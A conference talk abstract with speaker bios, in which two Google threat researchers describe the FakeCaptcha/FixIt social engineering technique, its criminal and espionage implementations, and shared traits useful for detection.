Thursday 25 September 12:00 - 12:30, Red room
Dmitrij Lenz & Roberto Dasilva (Google)
Social engineering has historically been an integral part of many infection chains. Different techniques emerge within the field of social engineering, with some achieving widespread usage. This was observed with the "FakeCaptcha/FixIt" TTP during the latter half of 2024. "FakeCaptcha/FixIt" attacks involve tricking victims into copying commands from malicious websites or emails and then executing them in their command-line interface.
The TTP was so effective that multiple threat actors began to sell builders for these landing pages, with services tailored to different delivery mechanisms (e.g. email spam, malvertising). Simultaneously, several distinct internal implementations were discovered, each connected to a specific threat cluster. Finally, some actors utilize a drive-by distribution method and adopt only the narrative, while others combine the technique with other methods, such as FakeUpdate.
Although attacks might appear identical from the user's point of view, the exact implementations are different. This presentation details each implementation including their infrastructure, observed stages, final payloads, and a service component if such exists. Additionally, given that most kits underwent continuous development throughout 2024 and 2025, we will illustrate how some implementations have evolved over time. Our pipelines enable reliable collection of malware that is distributed by FakeCaptcha, providing a statistical overview of the ecosystem and its players. We will also see how more espionage-oriented actors are embracing the same technique. Espionage kits are often built from readily available components found in crime FakeCaptcha kits, with the addition of more advanced cloaking mechanisms.
Finally, we will examine the factors that make this technique effective, such as diminished value of PS-Execution policy and resonating comments like "I am not a robot - reCAPTCHA Verification ID" after the command. Some shared attributes among various implementations will be highlighted to help with monitoring and prevention.
![]() |
Dmitrij Lenz Dmitrij Lenz is a cyber threat expert with an interest in the crime ecosystem. In his research, Dmitrij analyses the mechanisms that facilitate the operations of threat actors, including botnets, loaders, and C2 platforms, among others. At the Google Threat Analysis Group, his responsibilities revolve around tracking and disrupting extortion campaigns and associated antecedent activities.
|
Roberto Dasilva Roberto brings more than a decade of combined expertise in cybersecurity, including incident response, SOC analysis, malware analysis, and threat intelligence. He has also shared his knowledge as a Master's degree teacher and presented at various industry conferences. For the past three years, Roberto has been a valuable member of the Threat Intelligence department at Google. |
Back to VB2025 conference page